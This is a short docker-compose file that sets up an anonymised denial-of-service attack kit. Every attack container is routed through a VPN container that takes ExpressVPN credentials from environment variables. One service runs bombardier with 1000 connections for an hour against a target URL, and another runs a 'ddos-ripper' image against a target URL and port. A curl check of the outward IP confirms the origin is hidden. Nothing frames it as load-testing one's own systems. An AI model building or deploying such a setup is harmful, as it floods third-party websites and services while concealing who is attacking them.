version: "3"
services:
  test:
    image: alpine/curl:3.14
    network_mode: "service:vpn"
    command: "curl ipinfo.io"
    depends_on: 
      - vpn
  bombardier:
    image: alpine/bombardier
    command: "-c 1000 -d 3600s -l ${B_TARGET_URL}"
    network_mode: "service:vpn"
    depends_on: 
      - vpn
  ddosripper:
    image: nitupkcuf/ddos-ripper:latest
    command: "${R_TARGET_URL} ${TARGET_PORT}"
    network_mode: "service:vpn"
    depends_on: 
      - vpn
  checksites:
    image: loginincorrect/checksites
    network_mode: "service:vpn"
    depends_on: 
      - vpn
  vpn:
    image: qmcgaw/gluetun
    cap_add:
      - NET_ADMIN
    devices: 
      - /dev/net/tun
    privileged: true
    tty: true
    environment:
      - VPN_SERVICE_PROVIDER=expressvpn
      - OPENVPN_USER=${VPN_USER}
      - OPENVPN_PASSWORD=${VPN_CODE}
      - SERVER_COUNTRIES=${VPN_COUNTRY}
    deploy:
      restart_policy:
        condition: on-failure
        max_attempts: 300